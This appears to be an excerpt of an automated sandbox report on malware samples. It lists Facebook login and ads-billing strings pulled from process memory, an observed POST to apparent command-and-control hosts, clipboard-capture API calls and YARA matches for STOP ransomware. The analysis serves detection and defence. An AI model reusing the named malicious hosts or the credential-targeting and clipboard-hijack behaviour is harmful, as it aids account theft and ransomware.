Source: llpb1133.exe, 00000014.00000002.604730284.0000000002841000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: e</a></li><li><a class="_sv4" dir="rtl" href="https://ar-ar.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;ar_AR&quot;, &quot;en_US&quot;, &quot;https:\/\/ar-ar.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 7); return false;" title="Arabic"> equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.0000000000489000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: eIwww.facebook.comHTEP equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.485706369.00000000004CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: eive from cookies on and off Facebook\u003C\/div>\u003C\/div>\u003Cdiv class=\"_9xo2\">\u003Ci class=\"img sp_StXu140q-14 sx_9a85b3\">\u003C\/i>\u003Cdiv class=\"_9xo4\">Provide and improve Meta Products for people who have an account\u003C\/div>\u003C\/div>\u003C\/div>\u003Cdiv class=\"_9xo0\">\u003C\/div>\u003Cdiv>\u003Cdiv>For advertising and measurement services off of Meta Products, analytics, and to provide certain features and improve our services for you, we use tools from other companies on Facebook. These companies also use cookies.\u003C\/div>\u003Cdiv class=\"_9xo3\">You can allow the use of all cookies, just essential cookies or you can choose more options below. You can learn more about cookies and how we use them, and review or change your choice at any time in our \u003Ca href=\"https:\/\/www.facebook.com\/policies\/cookies\/\" target=\"_blank\" class=\"_9o-v\" id=\"cpn-pv-link\">Cookie Policy\u003C\/a>.\u003C\/div>\u003C\/div>\u003Cdiv>\u003Cdiv>\u003Cdiv class=\"_9xpv\">\u003Cdiv>\u003Cdiv class=\"_9xpw\">Essential cookies\u003C\/div>\u003Cdiv>These cookies are required to use Meta Products. They\u2019re necessary for these sites to work as intended.\u003C\/div>\u003C\/div>\u003C\/div>\u003Cdiv class=\"_9xo0\">\u003C\/div>\u003C\/div>\u003Cdiv>\u003Cp class=\"_9o-k\">Optional cookies\u003C\/p>\u003Cp>\u003C\/p>\u003Cdiv>\u003Cdiv>\u003Cdiv class=\"_9xp-\">Cookies from other companies\u003C\/div>\u003Cdiv class=\"_9o-i\">We use tools from \u003Ca href=\ equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.605295836.000000000289E000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000002.603774182.0000000000549000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/ac equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.484805156.0000000000502000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billing equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.603774182.0000000000596000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000002.603774182.0000000000549000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billing equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billing"wg equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.603774182.0000000000549000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billing0 equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billingPv equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000003.522653816.0000000000522000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billingalue132sames equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.603774182.0000000000549000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billinge equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.603774182.0000000000596000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billingm equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billingndex_meta_1 equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billingr equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.603774182.0000000000549000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billings equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.461533941.000000000052C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/ackY5HfXu3h@v equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000003.520897937.00000000004BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/aco","coho equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.603774182.0000000000513000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing1 equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.604730284.0000000002841000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billingF equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.00000000004BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billingbook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.603774182.0000000000549000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billinging equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.482623800.0000000000558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billingm) equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.477974039.00000000004CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billings equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.482623800.0000000000558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com:443 equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com:443/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com:443/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing0 equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.00000000004D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ihttps://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.605295836.00000000028BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.605295836.00000000028BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;x-fb-rlafr0Persistent-AuthWWW-AuthenticateVarySet-CookieServerRetry-AfterProxy-SupportProxy-AuthenticateP3Phttps://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billingLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedSat, 01 Jan 2000 00:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset="utf-8"Content-Type0Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerno-cachePragmaKeep-AliveTue, 07 Feb 2023 18:46:36 GMTDateProxy-ConnectioncloseConnectionprivate, no-cache, no-store, must-revalidateCache-ControlPG7 equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ol</a></li><li><a class="_sv4" dir="ltr" href="https://tr-tr.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;tr_TR&quot;, &quot;en_US&quot;, &quot;https:\/\/tr-tr.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 6); return false;" title="Turkish">T equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: onloadRegister_DEPRECATED(function (){begin_polling_login_cookies("https:\/\/www.facebook.com\/ads\/manager\/account_settings\/account_billing");});</script> equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.0000000000489000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: rXVad9Rwww.facebook.comaAc2sNw2CQ/tDh equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.485706369.00000000004CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]} equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.00000000004A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: report-to: {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]} equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: s (Portugal)</a></li><li><a class="_sv4" dir="ltr" href="https://sq-al.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;sq_AL&quot;, &quot;en_US&quot;, &quot;https:\/\/sq-al.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 4); return false;" title="Albanian">Shqip</a></li><li><a class="_sv4" dir="ltr" href="https://es-la.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;es_LA&quot;, &quot;en_US&quot;, &quot;https:\/\/es-la.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 5); return false;" title="Spanish">Espa equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.602257740.00000000004CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: sFullUpdate:true,needsPartialUpdate:false,shouldLogResourcePerf:false},3977],["WebStorageMonsterLoggingURI",[],{uri:"/ajax/webstorage/process_keys/?state=1"},3032],["BrowserPaymentHandlerConfig",[],{enabled:false},3904],["TimeSpentConfig",[],{delay:1000,timeout:64,"0_delay":0,"0_timeout":8},142],["cr:1634616",["UserActivityBlue"],{__rc:["UserActivityBlue","Aa1oVQO0yWyvfaoFs9wSOeaQlUPyEbHP8fawDnddMqXKEgKpM_9koC5Pk5-P8qhie_uf5KCJjyNsPhcEXFNVNUCWnLk"]},-1],["cr:844180",["TimeSpentImmediateActiveSecondsLoggerBlue"],{__rc:["TimeSpentImmediateActiveSecondsLoggerBlue","Aa1oVQO0yWyvfaoFs9wSOeaQlUPyEbHP8fawDnddMqXKEgKpM_9koC5Pk5-P8qhie_uf5KCJjyNsPhcEXFNVNUCWnLk"]},-1],["cr:1187159",["BlueCompatBroker"],{__rc:["BlueCompatBroker","Aa1oVQO0yWyvfaoFs9wSOeaQlUPyEbHP8fawDnddMqXKEgKpM_9koC5Pk5-P8qhie_uf5KCJjyNsPhcEXFNVNUCWnLk"]},-1],["ImmediateActiveSecondsConfig",[],{sampling_rate:0},423]],require:[["NavigationMetrics","setPage",[],[{page:"/login.php",page_type:"normal",page_uri:"https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing",serverLID:"7197487234070021903"}]],["FalcoLoggerTransports","attach",[],[]],["ClickRefLogger"],["DetectBrokenProxyCache","run",[],[0,"c_user"]],["NavigationClickPointHandler"],["WebDevicePerfInfoLogging","doLog",[],[]],["WebStorageMonster","schedule",[],[]],["DeferredCookie","addToQueue",[],["_js_datr","gZziYzzFf_vTKeue4tgHUC4S",63072000000,"/",true,false,true]],["DeferredCookie","addToQ equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.484805156.0000000000502000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.485706369.00000000004C8000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.480306540.0000000000513000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.605295836.000000000289E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.com/ equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.461533941.000000000052C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.com07"cohort":"1:swl:"," equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.604730284.0000000002834000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.com3966fc5c1f009ecd22e4b74973b5675 equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.00000000004E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.com5 equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.com5 equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000003.520897937.00000000004BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.comN equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.604730284.0000000002841000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.comP equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.603774182.0000000000549000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.comQ equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.comU equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.603774182.0000000000549000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.comh8 equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.comook.com/-y equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.comppatey.com|vk equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.comvwq equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.com} equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.485706369.00000000004C8000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.477974039.00000000004C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]} equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.604730284.0000000002841000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]} equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.605295836.000000000288C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: {"status":3,"accounts":"0"}JaU9pSlNSVWszYlhjaWZleUp6YVdRaU9qSTRPREF4T1N3aWRHbHRaU0k2TVRZM05UUT09ctingClientSingleton:{r:["Jg4hod5","3zhsDmU","Yv2Rq7N"],rds:{m:["ContextualConfig","BladeRunnerClient","DGWRequestStreamClient","MqttLongPollingRunner","BanzaiScuba_DEPRECATED"],r:["c6kpRKc","9Zir1u8","sqCOqNp","HN4gUih","foz7nw7","msMcd10","TjYa5zM","5p9Jgd9","Ajrp3n3","CUpDMe1"]},be:1},RequestStreamCommonRequestStreamCommonTypes:{r:["Jg4hod5"],be:1}}}},allResources:["c6kpRKc","sqCOqNp","GpQFBwL","TjYa5zM","foz7nw7","CUpDMe1","msMcd10","BnbajS7","HN4gUih","Da6rL6k"]});}));</script></body></html>ActiveSecondsConfig",[],{sampling_rate:0},423]],require:[["NavigationMetrics","setPage",[],[{page:"/login.php",page_type:"normal",page_uri:"https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing",serverLID:"7197487281236720703"}]],["FalcoLoggerTransports","attach",[],[]],["ClickRefLogger"],["DetectBrokenProxyCache","run",[],[0,"c_user"]],["NavigationClickPointHandler"],["WebDevicePerfInfoLogging","doLog",[],[]],["WebStorageMonster","schedule",[],[]],["Artillery","disable",[],[]],["ScriptPathLogger","startLogging",[],[]],["TimeSpentBitArrayLogger","init",[],[]],["DeferredCookie","addToQueue",[],["_js_datr","jJziY-D4SfNE_AIOga4wSI2k",63072000000,"/",true,false,true]],["DeferredCookie","addToQueue",[],["_js_sb","jJziY-AS0VgVTvocQFmmqm_m",63072000000,"/",false,false,true]]]},hsrp:{hsdp:{clpData:{"1871697":{r:1,s:1},"1829319":{P equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.605295836.000000000288C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: {"status":3,"accounts":"0"}JaU9pSlNSVWszYlhjaWZleUp6YVdRaU9qSTRPREF4T1N3aWRHbHRaU0k2TVRZM05UUT09ctingClientSingleton:{r:["Jg4hod5","3zhsDmU","Yv2Rq7N"],rds:{m:["ContextualConfig","BladeRunnerClient","DGWRequestStreamClient","MqttLongPollingRunner","BanzaiScuba_DEPRECATED"],r:["c6kpRKc","9Zir1u8","sqCOqNp","HN4gUih","foz7nw7","msMcd10","TjYa5zM","5p9Jgd9","Ajrp3n3","CUpDMe1"]},be:1},RequestStreamCommonRequestStreamCommonTypes:{r:["Jg4hod5"],be:1}}}},allResources:["c6kpRKc","sqCOqNp","GpQFBwL","TjYa5zM","foz7nw7","CUpDMe1","msMcd10","BnbajS7","HN4gUih","Da6rL6k"]});}));</script></body></html>ActiveSecondsConfig",[],{sampling_rate:0},423]],require:[["NavigationMetrics","setPage",[],[{page:"/login.php",page_type:"normal",page_uri:"https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing",serverLID:"7197487281236720703"}]],["FalcoLoggerTransports","attach",[],[]],["ClickRefLogger"],["DetectBrokenProxyCache","run",[],[0,"c_user"]],["NavigationClickPointHandler"],["WebDevicePerfInfoLogging","doLog",[],[]],["WebStorageMonster","schedule",[],[]],["Artillery","disable",[],[]],["ScriptPathLogger","startLogging",[],[]],["TimeSpentBitArrayLogger","init",[],[]],["DeferredCookie","addToQueue",[],["_js_datr","jJziY-D4SfNE_AIOga4wSI2k",63072000000,"/",true,false,true]],["DeferredCookie","addToQueue",[],["_js_sb","jJziY-AS0VgVTvocQFmmqm_m",63072000000,"/",false,false,true]]]},hsrp:{hsdp:{clpData:{"1871697":{r:1,s:1},"1829319":{PPTP){3DFD28C0-5D9B-43CA-809F-C01D8A78D17E}}Ada11 equals www.facebook.com (Facebook)
Source: unknown HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qmxjpgcre.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: potunulit.org
Source: unknown HTTPS traffic detected: 158.69.96.67:443 -> 192.168.2.3:49700 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49701 version: TLS 1.2
Source: unknown HTTPS traffic detected: 157.240.253.35:443 -> 192.168.2.3:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.3:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.3:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49717 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49721 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match File source: 00000000.00000002.313394418.0000000000851000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.313299344.0000000000720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.443874552.00000000007E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.444700260.00000000021E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_00402830 Concurrency::cancel_current_task,Concurrency::cancel_current_task,Concurrency::cancel_current_task,OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,SetClipboardData,CloseClipboard,CloseClipboard,GlobalFree,OpenClipboard,GetClipboardData,CloseClipboard,GlobalLock,GlobalUnlock,CloseClipboard,CloseClipboard, 11_2_00402830
Source: file.exe, 00000000.00000002.313412011.0000000000918000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Spam, unwanted Advertisements and Ransom Demands

Source: Yara match File source: 15.2.3046.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.3046.exe.23515a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 42.2.3046.exe.23315a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.3046.exe.23515a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.3046.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 42.2.3046.exe.23315a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.3046.exe.23515a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.3046.exe.23515a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 39.2.3046.exe.23815a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 39.2.3046.exe.23815a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.396916881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.467843881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000002.518796436.0000000002330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.516427401.0000000002350000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.518320509.0000000002380000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 3046.exe PID: 3680, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 3046.exe PID: 5672, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 3046.exe PID: 3112, type: MEMORYSTR

System Summary

Source: 15.2.3046.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 15.2.3046.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 33.2.3046.exe.23515a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 33.2.3046.exe.23515a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
